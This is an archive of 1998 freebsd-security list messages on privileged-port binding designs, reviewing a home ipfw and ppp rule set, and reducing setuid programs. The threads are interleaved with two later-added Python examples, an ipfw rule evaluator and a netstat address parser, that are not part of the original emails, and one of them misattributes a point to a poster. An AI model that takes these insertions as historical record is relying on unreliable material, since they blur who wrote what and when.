> you (and others) seem very keen on doing this. maybe you should do
> some more research about what's around now before taking this much
> further.

I've been trying to do so; thank you for opening up ftp access to the
mount_portal code you've modified. The listen-only aspect is one thing
that I've been looking at, for safety with rsh et al. Any suggestions
as to other places to look at?

-Allen

--
Allen Smith
easmith@beatrice.rutgers.edu


From owner-freebsd-security Fri Jul 3 02:47:56 1998
From: "Allen Smith"
Message-Id: <9807030541.ZM8314@beatrice.rutgers.edu>
Date: Fri, 3 Jul 1998 05:41:03 -0400
In-Reply-To: Niall Smart "Re: bsd securelevel patch question" (Jul 2, 6:23pm)
References: <199807021723.SAA00883@indigo.ie>
To: rotel@indigo.ie, Poul-Henning Kamp
Subject: Re: bsd securelevel patch question
Cc: dg@root.com, security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com

On Jul 2, 6:23pm, Niall Smart (possibly) wrote:
> On Jul 2, 7:04pm, Poul-Henning Kamp wrote:
> } Subject: Re: bsd securelevel patch question
> >
> > >That's not true, if he hacks the user/group that the web server runs
> > >at then he only owns the web server, the only additional privilege
> > >he gains is the ability to bind to port 80.
> >
> > which is worse than the standard: he cannot bind to any port < 1024.

There is also the question of whether one prefers:

A. a server that sometimes runs as root and sometimes not, which gives
   the possibility that someone may take root; or
B. a server that always runs as a user with one privilege, and is
   otherwise the same as an ordinary user.

Given the nasty possibilities inherent in a root takeover, I prefer the
latter if these are the only choices.

> Well, this depends on how the server runs, if it binds to the port
> and then setuid()'s to a lower privilege then this is true. There
> are clients out there that are purely setuid just so they can bind
> to a port < 1024 however, so it has valid uses.

There is also the option of having the server be run as a setuid
binary by the less-privileged user, in which case (using the
setuid/group (or a similar setuid/privilege) scheme I outlined earlier)
it will when resetting its effective uid to its real uid remove the
privileges in question.
Admittedly, causing servers not running as root to do this may require
some rewriting; many assume that they can't (or at least shouldn't)
reset their euid when the euid isn't root, and that there's no need to
reset their euid back to anything but root.

-Allen

--
Allen Smith
easmith@beatrice.rutgers.edu


From owner-freebsd-security Fri Jul 3 02:55:21 1998
From: "Allen Smith"
Message-Id: <9807030553.ZM8446@beatrice.rutgers.edu>
Date: Fri, 3 Jul 1998 05:53:35 -0400
In-Reply-To: David Greenman "Re: bsd securelevel patch question" (Jul 2, 9:00am)
References: <199807021600.JAA24882@implode.root.com>
To: dg@root.com, rotel@indigo.ie
Subject: Re: bsd securelevel patch question
Cc: security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com

On Jul 2, 9:00am, David Greenman (possibly) wrote:
> Um, well, let's talk about FTP servers, then, since those do a privileged
> bind() for every data connection that is established (one per file
> transfer).

Good point.
The various examples here are pointing out something: in most cases,
and so far as I know in all of the most frequent cases, it's only
necessary to be able to bind to _one_ privileged port. (By 'the most
frequent cases', I'm referring to that while the FTP server has to bind
to both port 20 and port 21, the latter is far more frequent than the
former - the first just happens when starting up a new daemon (and is
usually done by inetd in any event).) This implies that one way to
speed things up would be to have as extra fields in a privilege
structure (or as part of the ucred structure) the main tcp or udp port
the process is permitted to bind to. In this way, one would simply
check:

A. does the process have the PRIV_TCP (or PRIV_UDP) privilege;
B. if so, is the port in the privilege/ucred structure equal to the
   requested one (with a 0 meaning none has been established)? If so,
   allow
C. if not, do whatever scanning is necessary to figure out if the port
   is allowable; if it is, then put that port # in the privilege/ucred
   structure

-Allen

--
Allen Smith
easmith@beatrice.rutgers.edu


From owner-freebsd-security Fri Jul 3 03:29:06 1998
From: David Greenman
Reply-To: dg@root.com
Message-Id: <199807031028.DAA06648@implode.root.com>
To: "Allen Smith"
cc: rotel@indigo.ie, security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com
Subject: Re: bsd securelevel patch question
In-reply-to: Your message of "Fri, 03 Jul 1998 05:53:35 EDT." <9807030553.ZM8446@beatrice.rutgers.edu>
Date: Fri, 03 Jul 1998 03:28:10 -0700

>On Jul 2, 9:00am, David Greenman (possibly) wrote:
>
>> Um, well, let's talk about FTP servers, then, since those do a privileged
>> bind() for every data connection that is established (one per file
>> transfer).
>
>Good point. The various examples here are pointing out something: in
>most cases, and so far as I know in all of the most frequent cases,
>it's only necessary to be able to bind to _one_ privileged port. (By
>'the most frequent cases', I'm referring to that while the FTP server
>has to bind to both port 20 and port 21, the latter is far more
>frequent than the former - the first just happens when starting up a
>new daemon (and is usually done by inetd in any event).) This implies
>that one way to speed things up would be to have as extra fields in a
>privilege structure (or as part of the ucred structure) the main tcp
>or udp port the process is permitted to bind to. In this way, one
>would simply check:
> A. does the process have the PRIV_TCP (or PRIV_UDP) privilege;
> B. if so, is the port in the privilege/ucred structure equal
> to the requested one (with a 0 meaning none has been
> established)? If so, allow
> C. if not, do whatever scanning is necessary to figure out if
> the port is allowable; if it is, then put that port # in
> the privilege/ucred structure

Okay, so you are saying that the PRIV_* port privileges would be
honored only for the first privileged port number that is bind()'ed
[sic]? Hmmm...sounds interesting. I like that a lot better than
assigning 1024 gids to TCP, another 1024 gids to UDP, etc.
-DG

David Greenman
Co-founder/Principal Architect, The FreeBSD Project


From owner-freebsd-security Fri Jul 3 05:14:38 1998
From: "Allen Smith"
Message-Id: <9807030812.ZM10157@beatrice.rutgers.edu>
Date: Fri, 3 Jul 1998 08:12:54 -0400
In-Reply-To: David Greenman "Re: bsd securelevel patch question" (Jul 3, 3:28am)
References: <199807031028.DAA06648@implode.root.com>
To: dg@root.com
Subject: Re: bsd securelevel patch question
Cc: rotel@indigo.ie, security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com

On Jul 3, 3:28am, David Greenman (possibly) wrote:
> Okay, so you are saying that the PRIV_* port privileges would be
> honored only for the first privileged port number that is
> bind()'ed [sic]? Hmmm...sounds interesting. I like that a lot
> better than assigning 1024 gids to TCP, another 1024 gids to UDP,
> etc.
Actually, I'd just had in mind this as a means of speeding up (via caching) the port allowability determination (yes, I've listened to what you've commented regarding the speed of scanning the potentially large group set), but the further notion that you bring up has some definite possibilities. From my look-over of kern_fork.c, the ucred structure (which is where I'd have in mind placing this) is essentially copied from parent to child, so that'll ensure that a child process can't choose a new port to bind to. The addition of syscalls to check and set the ports in question would be an additional security measure for doing stuff via login.conf, as you had suggested earlier (i.e., while either login.conf or (as I'd prefer) groups could be used for setting the basic privileges, login.conf could be used for setting which port a given PRIV_TCP or PRIV_UDP uid-derived process could bind to). While this combination isn't as secure for setuid binaries as the gid-to-port mapping I'd mentioned earlier, it does have the advantage that you point out of not occupying large slices of the gid space. OTOH, I certainly am not a security expert, so there could be something I'm missing.

Hmm... I just looked over (further) the libutil source code, and it doesn't look that difficult to add this functionality into (namely into functions called by setusercontext). How would LOGIN_SETPRIV be as the applicable flag? I'm thinking that this would be definitely appropriate for having available to a class (via setclasscontext), since it'd be overridable by individual user entries anyway.

Incidentally, how many differences are there between -stable and -current on stuff concerned with this? The main system I have to work with is running -stable, and that's not likely to change, for reliability reasons.
I may be able to get a spare computer running -current, but that really can't take priority - it's not what I'm paid for, whereas getting the firewall computer (which is -stable) running (indirectly) is. I do have around a copy of /usr/src/sys -current that's updated whenever the main system is, which I can use for at least making sure the patches go in properly and that the kernel will compile.

-Allen

-- 
Allen Smith easmith@beatrice.rutgers.edu

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message

From owner-freebsd-security Fri Jul 3 19:03:46 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA23098 for freebsd-security-outgoing; Fri, 3 Jul 1998 19:03:46 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from sunra.csci.unt.edu (sunra.csci.unt.edu [129.120.3.43]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA23093 for ; Fri, 3 Jul 1998 19:03:41 -0700 (PDT) (envelope-from louie@sunra.csci.unt.edu) Received: (from louie@localhost) by sunra.csci.unt.edu (8.8.7/8.8.7) id UAA20374 for freebsd-security@FreeBSD.ORG; Fri, 3 Jul 1998 20:58:16 -0500 (CDT) (envelope-from louie) Date: Fri, 3 Jul 1998 20:58:16 -0500 (CDT) From: Louie Message-Id: <199807040158.UAA20374@sunra.csci.unt.edu> To: freebsd-security@FreeBSD.ORG Subject: ipfw with ppp -alias setup Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

I'm using userland ppp with packet aliasing to give a private address IP network (192.168.1.x on ed0) Internet access through a dialup ISP that assigns dynamic IP addresses. This works. I'm also using ipfw for packet filtering. This also works but since I don't claim to be a security expert I'm not sure if I've set this up properly. I'm using ipfw instead of ppp's packet filtering because I prefer ipfw's log output. (Maybe not a good reason.) My intentions are to block just about everything from the Internet. (Call me paranoid.)
I've also tried to define an ipfw rule list using just interface names since the IP addresses my ISP assigns can vary over multiple class C networks. I also don't want to have to rerun ipfw every time I make a new connection with my ISP.

Enough background. My question is, will this rule list work or have I just proved I don't know what I'm doing?

# ipfw list
01000 allow ip from any to any via lo0
01010 deny ip from 127.0.0.0/8 to 127.0.0.0/8
01110 deny log ip from 192.168.0.0/16 to any in recv tun0
01210 deny log ip from 172.16.0.0/12 to any in recv tun0
01310 deny log ip from 10.0.0.0/8 to any in recv tun0
01410 allow tcp from any to any in recv tun0 established
01510 deny log tcp from any to any in recv tun0 setup
01610 allow tcp from any to any out xmit tun0
01710 allow tcp from any to any via ed0
01810 allow udp from any 53 to any
01910 allow udp from any to any 53
02010 allow icmp from any to any icmptype 0
02110 allow icmp from any to any icmptype 3
02210 allow icmp from any to any icmptype 8
02310 allow icmp from any to any icmptype 11
65535 deny ip from any to any

Thanks for your time,
Louie

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message

From owner-freebsd-security Fri Jul 3 20:12:12 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA00386 for freebsd-security-outgoing; Fri, 3 Jul 1998 20:12:12 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell6.ba.best.com (jkb@shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA00367 for ; Fri, 3 Jul 1998 20:12:02 -0700 (PDT) (envelope-from jkb@best.com) Received: from localhost (jkb@localhost) by shell6.ba.best.com (8.9.0/8.9.0/best.sh) with SMTP id UAA29660; Fri, 3 Jul 1998 20:11:59 -0700 (PDT) X-Authentication-Warning: shell6.ba.best.com: jkb owned process doing -bs Date: Fri, 3 Jul 1998 20:11:59 -0700 (PDT) From: "Jan B.
Koum " X-Sender: jkb@shell6.ba.best.com To: Louie cc: freebsd-security@FreeBSD.ORG Subject: Re: ipfw with ppp -alias setup In-Reply-To: <199807040158.UAA20374@sunra.csci.unt.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Fri, 3 Jul 1998, Louie wrote:

>I'm using userland ppp with packet aliasing to give a private
>address IP network (192.168.1.x on ed0) Internet access through a
>dialup ISP that assigns dynamic IP addresses. This works. I'm
>also using ipfw for packet filtering. This also works but since
>I don't claim to be a security expert I'm not sure if I've set this
>up properly. I'm using ipfw instead of ppp's packet filtering
>because I prefer ipfw's log output. (Maybe not a good reason.)
>My intentions are to block just about everything from the Internet.
>(Call me paranoid.) I've also tried to define an ipfw rule list
>using just interface names since the IP addresses my ISP assigns
>can vary over multiple class C networks. I also don't want to have
>to rerun ipfw every time I make a new connection with my ISP.
>
>Enough background. My question is, will this rule list work or
>have I just proved I don't know what I'm doing?
>
># ipfw list
>01000 allow ip from any to any via lo0
>01010 deny ip from 127.0.0.0/8 to 127.0.0.0/8
>01110 deny log ip from 192.168.0.0/16 to any in recv tun0
                        ^^^^^^

Aren't you using 192.168.1.0/16 as you mentioned above?
>01210 deny log ip from 172.16.0.0/12 to any in recv tun0
>01310 deny log ip from 10.0.0.0/8 to any in recv tun0
>01410 allow tcp from any to any in recv tun0 established
>01510 deny log tcp from any to any in recv tun0 setup
>01610 allow tcp from any to any out xmit tun0
>01710 allow tcp from any to any via ed0
>01810 allow udp from any 53 to any
>01910 allow udp from any to any 53
>02010 allow icmp from any to any icmptype 0
>02110 allow icmp from any to any icmptype 3
>02210 allow icmp from any to any icmptype 8
>02310 allow icmp from any to any icmptype 11
>65535 deny ip from any to any

I'd also do:

ipfw add 65534 deny log ip from any to any

This way, if you see something not working you will have a log to debug. For example, your ftp will not work -- you'll have to use passive ftp. Otherwise you are going to see the server trying to connect to your port 40000+ (if I remember correctly) from its port 20. If you don't want to use passive ftp, then

ipfw add 1509 allow tcp from any 20 to any 40000-40100 in recv tun0
         ^^^^

Notice how it should be before 1510. Also, you have to add the incoming port and not just "... from any 20 to any" since if I am root, I can claim to be from port 20. :)

AFAICT the rules look ok. Really paranoid people might just take out icmp (think Phrack issue 51 article 6). But yeah, everything looks fine. Add the "deny log" rule before the last one if you want.

I am sure that if I missed something people here will correct me.

-- Yan

Jan Koum jkb@best.com                  | "Turn up the lights; I don't want
www.FreeBSD.org -- The Power to Serve  | to go home in the dark."
---------------------------------------+-----------------------------------
ICMP: What happens when you hack into a military network and they catch you.
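Jan's three points (ipfw is first-match, so the logging catch-all at 65534 and the active-FTP rule at 1509 only work where he puts them, and the FTP rule must carry the destination port range because anyone with root can send from port 20) can be checked without a FreeBSD box. The following is an added Python example, not code from the thread or from FreeBSD: a small evaluator for just the subset of ipfw syntax that Louie's list uses, run over constructed packets. The interface semantics are simplified (recv matches a packet arriving on that interface, xmit one leaving by it, via either); established is taken as ACK or RST set, setup as SYN without ACK. The addresses 198.51.100.23 (the dialup side) and 203.0.113.x (remote hosts) are made up for the example, and the 1509 variants are Jan's rule and the "from any 20 to any" form he warns against.

```python
import ipaddress
from collections import namedtuple

# Louie's rule list as posted, plus Jan's logging catch-all at 65534.
RULESET = """\
01000 allow ip from any to any via lo0
01010 deny ip from 127.0.0.0/8 to 127.0.0.0/8
01110 deny log ip from 192.168.0.0/16 to any in recv tun0
01210 deny log ip from 172.16.0.0/12 to any in recv tun0
01310 deny log ip from 10.0.0.0/8 to any in recv tun0
01410 allow tcp from any to any in recv tun0 established
01510 deny log tcp from any to any in recv tun0 setup
01610 allow tcp from any to any out xmit tun0
01710 allow tcp from any to any via ed0
01810 allow udp from any 53 to any
01910 allow udp from any to any 53
02010 allow icmp from any to any icmptype 0
02110 allow icmp from any to any icmptype 3
02210 allow icmp from any to any icmptype 8
02310 allow icmp from any to any icmptype 11
65534 deny log ip from any to any
65535 deny ip from any to any
"""
ACTIVE_FTP = "01509 allow tcp from any 20 to any 40000-40100 in recv tun0"
SLOPPY_FTP = "01509 allow tcp from any 20 to any in recv tun0"  # what Jan warns against

# A packet as the filter sees it; `flags` holds the TCP flags that are set.
Packet = namedtuple("Packet", "proto src dst direction iface sport dport flags icmptype",
                    defaults=(0, 0, frozenset(), -1))

def _ports(tok):                      # "20" -> (20, 20); "40000-40100" -> (40000, 40100)
    lo, _, hi = tok.partition("-")
    return int(lo), int(hi or lo)

def parse_rule(line):
    """Parse one rule in the subset of ipfw syntax used above into a dict."""
    t = line.split()
    r = {"num": int(t[0]), "action": t[1], "log": t[2] == "log"}
    i = 3 if r["log"] else 2
    r["proto"], i = t[i], i + 1                      # t[i] is now "from"
    r["src"], i = t[i + 1], i + 2
    r["sport"], i = (_ports(t[i]), i + 1) if t[i] != "to" else (None, i)
    r["dst"], i = t[i + 1], i + 2                    # skips the "to"
    r["dport"], i = (_ports(t[i]), i + 1) if i < len(t) and t[i][0].isdigit() else (None, i)
    while i < len(t):                                # trailing options
        if t[i] in ("in", "out", "established", "setup"):
            r[t[i]], i = True, i + 1
        elif t[i] in ("recv", "xmit", "via", "icmptype"):
            r[t[i]], i = t[i + 1], i + 2
        else:
            raise ValueError("unsupported keyword %r" % t[i])
    return r

def load_rules(text):
    return sorted((parse_rule(l) for l in text.splitlines() if l.strip()), key=lambda r: r["num"])

def add_rule(rules, line):
    """Like `ipfw add`: insert (or replace) a rule, keeping number order."""
    new = parse_rule(line)
    return sorted([r for r in rules if r["num"] != new["num"]] + [new], key=lambda r: r["num"])

def _addr(spec, addr):
    return spec == "any" or ipaddress.ip_address(addr) in ipaddress.ip_network(spec, strict=False)

def _port(rng, port):
    return rng is None or rng[0] <= port <= rng[1]

def matches(r, p):
    """Does rule r match packet p?  Simplified interface model: recv = arrived on
    that interface, xmit = leaves by it, via = either direction."""
    want_dir = {"in": "in", "out": "out", "recv": "in", "xmit": "out"}
    return (
        r["proto"] in ("ip", p.proto)
        and _addr(r["src"], p.src) and _addr(r["dst"], p.dst)
        and _port(r["sport"], p.sport) and _port(r["dport"], p.dport)
        and all(p.direction == d for k, d in want_dir.items() if k in r)
        and all(p.iface == r[k] for k in ("recv", "xmit", "via") if k in r)
        and ("established" not in r or bool(p.flags & {"ack", "rst"}))
        and ("setup" not in r or ("syn" in p.flags and "ack" not in p.flags))
        and ("icmptype" not in r or int(r["icmptype"]) == p.icmptype)
    )

def evaluate(rules, p):
    """First match wins, as in ipfw: returns (rule number, action, logged?)."""
    for r in rules:
        if matches(r, p):
            return r["num"], r["action"], r["log"]
    raise RuntimeError("nothing matched; rule 65535 should always match")

# Constructed packets: 198.51.100.23 is the dialup side, 203.0.113.x are remote hosts.
ME, REMOTE, SYN, SYN_ACK = "198.51.100.23", "203.0.113.9", frozenset({"syn"}), frozenset({"syn", "ack"})
SAMPLES = {
    "spoofed_private_src": Packet("tcp", "192.168.1.7", ME, "in", "tun0", 1234, 25, SYN),
    "reply_to_our_connection": Packet("tcp", REMOTE, ME, "in", "tun0", 80, 51000, SYN_ACK),
    "active_ftp_data": Packet("tcp", REMOTE, ME, "in", "tun0", 20, 40010, SYN),
    "fake_port20_to_telnet": Packet("tcp", REMOTE, ME, "in", "tun0", 20, 23, SYN),
    "outbound_http": Packet("tcp", ME, REMOTE, "out", "tun0", 51000, 80, SYN),
    "icmp_redirect": Packet("icmp", "203.0.113.1", ME, "in", "tun0", icmptype=5),
}

def report(rules):
    """Map each sample packet to the (number, action, logged?) that decides it."""
    return {name: evaluate(rules, p) for name, p in SAMPLES.items()}
```

With the list as posted, `report(load_rules(RULESET))` shows the active-FTP data SYN dying at 1510 and the ICMP redirect falling through to the logging 65534 rule. After `add_rule(..., ACTIVE_FTP)` the data connection is allowed at 1509 while a SYN from port 20 aimed at port 23 is still refused at 1510; after `add_rule(..., SLOPPY_FTP)` that same packet is let in, which is exactly the hole Jan describes.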
>
>Thanks for your time,
>Louie
>
>To Unsubscribe: send mail to majordomo@FreeBSD.org
>with "unsubscribe security" in the body of the message
>

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message

From owner-freebsd-security Fri Jul 3 23:52:41 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA17490 for freebsd-security-outgoing; Fri, 3 Jul 1998 23:52:41 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from infowest.com (infowest.com [204.17.177.10]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA17477 for ; Fri, 3 Jul 1998 23:52:39 -0700 (PDT) (envelope-from agifford@infowest.com) Received: from infowest.com (liberty.infowest.com [207.49.60.254]) by infowest.com (8.8.8/8.8.8) with ESMTP id AAA14261; Sat, 4 Jul 1998 00:50:55 -0600 (MDT) Message-ID: <359DD0C3.B683728B@infowest.com> Date: Sat, 04 Jul 1998 00:50:43 -0600 From: "Aaron D. Gifford" X-Mailer: Mozilla 4.05 [en] (X11; U; FreeBSD 2.2.6-STABLE i386) MIME-Version: 1.0 To: Louie CC: security@FreeBSD.ORG Subject: Re: ipfw with ppp -alias setup References: <199807040158.UAA20374@sunra.csci.unt.edu> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On my home FreeBSD box, I use ipfw filters as well. Instead of running rc.firewall every time I connect to my ISP, I use the /etc/ppp/ppp.linkup to execute my own custom ipfw script for me automatically. Here's what I've been using in /etc/ppp/ppp.linkup:

MYADDR:
 delete ALL
 add 0 0 HISADDR
 ! sh -c "/bin/sh /etc/rc.firewall &"

I've basically gutted rc.firewall and rewritten many parts for my own setup. I use ppp.linkup to execute it every time I establish a connection to my ISP.
Near the top of my custom rc.firewall script is this:

ip=`/usr/bin/netstat -in | perl -ne 'print $1 if ( /^tun0\s+[0-9]+\s+[0-9\.]+\s+([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})\s+/ );'`

(I hope my mail program doesn't wrap the perl expression line -- it is rather long)

It basically runs the 'netstat -in' command and then looks at the output for a line like:

Name  Mtu   Network       Address            Ipkts Ierrs    Opkts Oerrs  Coll
tun0  1500  10.2.6        10.2.6.112             0     0        0     0     0

The perl expression grabs the IP address (in the above line that would be '10.2.6.112') and spits it back out to be assigned to the 'ip' shell script variable, which I use extensively later on in my own rc.firewall script. Every time my modem connects, my firewall setup is automatically reset and updated for my new IP address.

I haven't tried to see if it is possible to pass MYADDR as a parameter to the script in /etc/ppp/ppp.linkup. That might work too, but since I have a working setup for now, I haven't been motivated to change things to find out.

I don't know if this is of any use to you in your situation, esp. since you mentioned that this sort of thing is not what you were looking for or asking.

Aaron out.
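Two things a practitioner would want to check in Aaron's approach: the perl regex only matches when the Network column is digits and dots, and if rc.firewall is started before tun0 has an address, $ip is empty and every rule built from it is loaded with a hole in it. The following is an added Python equivalent (not Aaron's code, and not part of FreeBSD) that selects the address by column instead and refuses to build address-based rules when there is no address. The `netstat -in` sample is constructed: only the tun0 row comes from Aaron's posting, while the ed0 and lo0 rows and their `<Link>` entries are assumptions about the surrounding output. The rule it emits for our own address is the one Jan's later spoofing point calls for: a packet arriving on the link that claims to come from this host.

```python
# Constructed `netstat -in` output in the layout Aaron quotes (header row first).
# Only the tun0 row is from his posting; the ed0/lo0 rows and the "<Link>"
# entries are assumptions about what the surrounding lines look like.
NETSTAT_UP = """\
Name  Mtu   Network       Address            Ipkts Ierrs    Opkts Oerrs  Coll
ed0   1500  <Link>        00.00.c0.12.34.56   8123     0     6041     0    12
ed0   1500  192.168.1     192.168.1.1         8123     0     6041     0    12
lo0   16384 <Link>                              42     0       42     0     0
lo0   16384 127           127.0.0.1             42     0       42     0     0
tun0  1500  10.2.6        10.2.6.112          2311     0     2007     0     0
"""
# The same box before the PPP link has been assigned an address.
NETSTAT_DOWN = "\n".join(NETSTAT_UP.splitlines()[:-1]) + "\n"


def _is_ipv4(s):
    parts = s.split(".")
    return len(parts) == 4 and all(p.isdigit() and int(p) <= 255 for p in parts)


def link_address(netstat_text, iface="tun0"):
    """IPv4 address of `iface` from `netstat -in` output, or None if it has none.
    Selecting by column avoids the regex's assumption that the Network column is
    digits and dots; <Link> rows are skipped because their Address column is not
    an IPv4 address."""
    for line in netstat_text.splitlines()[1:]:          # [0] is the header
        cols = line.split()
        if len(cols) > 3 and cols[0] == iface and _is_ipv4(cols[3]):
            return cols[3]
    return None


def firewall_rules(ip, iface="tun0", lan="192.168.1.0/24"):
    """The address-dependent part of an rc.firewall. Fails loudly without an
    address so a run before the link is up cannot install rules with an empty $ip."""
    if ip is None:
        raise ValueError("%s has no address yet; not building address-based rules" % iface)
    return [
        # spoofs impersonate this host: nothing arriving on the link may claim our address
        "ipfw add 1100 deny log ip from %s to any in recv %s" % (ip, iface),
        # nor may it claim to come from the LAN behind us
        "ipfw add 1110 deny log ip from %s to any in recv %s" % (lan, iface),
    ]


def linkup(netstat_text, iface="tun0"):
    """What the script run from ppp.linkup would do: find the address, build the rules."""
    return firewall_rules(link_address(netstat_text, iface), iface)
```

`linkup(NETSTAT_UP)` yields the two rules with 10.2.6.112 filled in; `linkup(NETSTAT_DOWN)` raises instead of silently producing `deny log ip from  to any`, which is the behaviour you want from a script that runs unattended on every dial-up.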
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message

From owner-freebsd-security Sat Jul 4 04:43:00 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id EAA23552 for freebsd-security-outgoing; Sat, 4 Jul 1998 04:43:00 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns0.fast.net.uk (ns0.fast.net.uk [194.207.104.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id EAA23544 for ; Sat, 4 Jul 1998 04:42:57 -0700 (PDT) (envelope-from netadmin@fastnet.co.uk) Received: from smack.my.bitch.up.fast.net.uk (ssmack.smack.smack.smack.smack.smack.smack.smack.smack.smack.fast.net.uk [194.207.104.143]) by ns0.fast.net.uk (8.9.0/8.8.7) with ESMTP id MAA03065 for ; Sat, 4 Jul 1998 12:42:29 +0100 (BST) Received: from localhost (localhost [127.0.0.1]) by smack.my.bitch.up.fast.net.uk (8.8.8/8.8.8) with SMTP id MAA00853 for ; Sat, 4 Jul 1998 12:32:10 GMT (envelope-from netadmin@fastnet.co.uk) Date: Sat, 4 Jul 1998 12:31:54 +0000 (GMT) From: Jay Tribick X-Sender: netadmin@smack.my.bitch.up.fast.net.uk To: freebsd-security@FreeBSD.ORG Subject: Increasing security by decreasing installed programs Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Hi all..

I think we all need to look closely at the default-installed suid/sgid programs. Why, by default, does FreeBSD install uucp*? There are not /that/ many people who use it and it would be much better as an optional component, especially as it runs suid/sgid.

Why not make the installation program let you select the suid binaries that are installed by default individually (instead of just selecting the basic distribution, let us go one level down and select individual basic packages)?
Regards,

Jay Tribick

[| Network Administrator | FastNet International | http://fast.net.uk/ |]
[| PGPv5 RSA Key Available [2047bit] | Finger netadmin@fastnet.co.uk |]
[| T: +44 (0)1273 677633 F: +44 (0)1273 621631 e: netadmin@fast.net.uk |]
[| ----={ PGPv5 Fingerprint := FA690E7762F0E62F38C6052CC387FFF3 }=---- |]

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message

From owner-freebsd-security Sat Jul 4 19:14:03 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA09044 for freebsd-security-outgoing; Sat, 4 Jul 1998 19:14:03 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from sunra.csci.unt.edu (sunra.csci.unt.edu [129.120.3.43]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA09017 for ; Sat, 4 Jul 1998 19:14:01 -0700 (PDT) (envelope-from louie@sunra.csci.unt.edu) Received: (from louie@localhost) by sunra.csci.unt.edu (8.8.7/8.8.7) id VAA22240; Sat, 4 Jul 1998 21:08:32 -0500 (CDT) (envelope-from louie) Date: Sat, 4 Jul 1998 21:08:32 -0500 (CDT) From: Louie Message-Id: <199807050208.VAA22240@sunra.csci.unt.edu> To: jkb@best.com, louie@sunra.csci.unt.edu Subject: Re: ipfw with ppp -alias setup Cc: freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Fri, 3 Jul 1998, Jan B. Koum wrote:

> ># ipfw list
> >01000 allow ip from any to any via lo0
> >01010 deny ip from 127.0.0.0/8 to 127.0.0.0/8
> >01110 deny log ip from 192.168.0.0/16 to any in recv tun0
>                         ^^^^^^
>
> Aren't you using 192.168.1.0/16 as you mentioned above?

Yes, but I'm blocking 192.168.1.0/16 from coming in on the PPP side. Spoof prevention.
> >01210 deny log ip from 172.16.0.0/12 to any in recv tun0
> >01310 deny log ip from 10.0.0.0/8 to any in recv tun0
> >01410 allow tcp from any to any in recv tun0 established
> >01510 deny log tcp from any to any in recv tun0 setup
> >01610 allow tcp from any to any out xmit tun0
> >01710 allow tcp from any to any via ed0
> >01810 allow udp from any 53 to any
> >01910 allow udp from any to any 53
> >02010 allow icmp from any to any icmptype 0
> >02110 allow icmp from any to any icmptype 3
> >02210 allow icmp from any to any icmptype 8
> >02310 allow icmp from any to any icmptype 11
> >65535 deny ip from any to any
>
> I'd also do:
> ipfw add 65534 deny log ip from any to any

I like this. Thanks.

> This way if you see something not working you will have a
> log to debug. For example, your ftp will not work -- you'll have to use
> passive ftp. Otherwise you are going to see the server trying to connect to your port
> 40000+ (if I remember correctly) from its port 20. If you don't want to
> use passive ftp, then
>
> ipfw add 1509 allow tcp from any 20 to any 40000-40100 in recv tun0
>          ^^^^
>
> Notice how it should be before 1510. Also, you have to add the
> incoming port and not just "... from any 20 to any" since if I am root, I
> can claim to be from port 20. :)

Since it's just me on the inside, I don't mind having to use passive mode.

> AFAICT the rules look ok. Really paranoid people might just take
> out icmp (think Phrack issue 51 article 6). But yeah, everything looks
> fine. Add the "deny log" rule before the last one if you want.

I'll have to check that out.

> I am sure that if I missed something people here will correct me.

I'm sure they will. :)

> -- Yan
>
> Jan Koum jkb@best.com                  | "Turn up the lights; I don't want
> www.FreeBSD.org -- The Power to Serve  | to go home in the dark."
> ---------------------------------------+-----------------------------------
> ICMP: What happens when you hack into a military network and they catch you.
Louie

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message

